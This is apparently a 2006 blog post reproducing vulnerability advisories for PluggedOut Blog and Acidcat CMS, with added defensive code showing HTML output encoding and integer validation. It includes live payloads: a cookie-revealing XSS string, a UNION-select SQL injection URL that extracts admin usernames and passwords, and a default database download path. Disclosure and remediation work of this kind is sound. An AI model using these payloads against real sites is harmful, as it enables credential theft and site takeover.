Monday, July 10, 2006

PluggedOut Blog SQL INJECTION and XSS

PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application. Rather than
give you a thousand things you don't really want ...
PluggedOut Blog: http://www.pluggedout.com/

Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):
admin@hamid.ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
PluggedOut Blog Version 1.9.9c (2006-01-13)

Example:
The following URL can be used to trigger an SQL injection vulnerability in exec.php via the entryid parameter:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]

The following URL triggers a reflected cross-site scripting (XSS) vulnerability in problem.php via the data parameter:
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team --> http://hamid.ir');alert(document.cookie)>/script<
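The root cause of the reflected XSS above is that problem.php writes the data parameter into the page without output encoding. The following is an added example, not code from PluggedOut Blog: it shows the HTML encoding a hardened version of that page should apply before echoing untrusted input (the same effect as PHP's htmlspecialchars with ENT_QUOTES), written in JavaScript for illustration. The renderProblem function and its markup are assumptions; the sample input is constructed from the advisory's payload.

```javascript
// Added example (not PluggedOut code): output-encode a reflected parameter
// before placing it in an HTML page. Equivalent in intent to PHP's
// htmlspecialchars($data, ENT_QUOTES); JavaScript is used here so the
// behaviour can be checked offline.

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Escape every character that can change HTML structure or break out of an
// attribute value. Each character is replaced exactly once, so an ampersand
// produced by an earlier replacement is never re-encoded.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render the problem page body the way a hardened problem.php should (assumed
// markup): both untrusted values appear only as encoded text.
function renderProblem(id, data) {
  return `<p>Problem ${escapeHtml(id)}: ${escapeHtml(data)}</p>`;
}

// Constructed input modelled on the advisory's payload, with the angle
// brackets as published on the page.
const sample = ">script<alert('x');alert(document.cookie)>/script<";

// renderProblem("1", sample) ->
// "<p>Problem 1: &gt;script&lt;alert(&#39;x&#39;);alert(document.cookie)&gt;/script&lt;</p>"
```

Encoding must happen at the point of output, not on the way in: the same string is safe as text in HTML but would need different treatment inside a script block or a URL, so storing a pre-encoded value does not remove the need to encode for the context it is finally written into.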

Acidcat ASP CMS Multiple Vulnerabilities

Acidcat CMS is a web site and simple content management system that can be administered via a web browser.
It is free for non-commercial use. Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities that allow a remote attacker to retrieve the administrator username and password.
Acidcat ASP CMS: http://www.acidcat.com

Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team): admin@hamid.ir.
The original article can be found at: http://hamid.ir/security/

Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example:
The following URL triggers an SQL injection vulnerability in the main_content.asp page; the database error shown below is returned: http://localhost/acidcat/default.asp?ID=1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16

Vulnerable Code:
The following line in main_content.asp builds the query by string concatenation. The ID value is inserted into the SQL unquoted, so doubling single quotes does not prevent injection: any input that contains no quote character reaches the database unchanged.
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";
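To make the defect concrete, here is an added example (not Acidcat's code) that places the original quote-escaping approach beside a hardened version. Because ID is a numeric column embedded without quotes, the fix is to validate the parameter as a canonical integer and reject anything else; with ADO the preferred form is a parameterized ADODB.Command with a ? placeholder, which cannot be demonstrated offline here. The function names and the 400-response handling mentioned in comments are assumptions; the inputs in the comments are taken from the advisory.

```javascript
// Added example, not Acidcat's code. Written in JavaScript to stay close to
// the JScript ASP original.

// Original approach: only doubles single quotes. Ineffective for an unquoted
// numeric value, since a quote is not needed to alter the statement.
function buildQueryOriginal(idParam) {
  return "SELECT * FROM Item WHERE ID = " + String(idParam).replace(/'/g, "''");
}

// Hardened approach: accept only a canonical decimal integer (digits only,
// bounded length) and return null for anything else. The caller is assumed to
// answer HTTP 400 when null is returned.
function parseItemId(idParam) {
  if (typeof idParam !== "string" || !/^\d{1,9}$/.test(idParam)) {
    return null;
  }
  return Number(idParam);
}

// Builds the statement only from a validated integer. Embedding the number is
// safe because it can no longer carry SQL syntax; a parameterized ADODB.Command
// would be the preferred production form.
function buildQueryHardened(idParam) {
  const id = parseItemId(idParam);
  if (id === null) {
    throw new RangeError("invalid item id");
  }
  return "SELECT * FROM Item WHERE ID = " + id;
}

// parseItemId("26")  -> 26
// parseItemId("1'")  -> null
// parseItemId("26 union select 1,username,3,password,5,6 from Configuration") -> null
```

The regular expression deliberately rejects whitespace, signs and decimal points rather than trying to strip them, so any value that is not already a plain integer is refused instead of being "cleaned" into something that may still be unsafe.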


Exploit:
The following URL retrieves the administrator username and password through a UNION query against the Configuration table:

http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The login page is located at:
http://localhost/acidcat/main_login.asp


Database Download:
In a default installation the database file can be downloaded over the web; it is located at http://localhost/acidcat/databases/acidcat.mdb
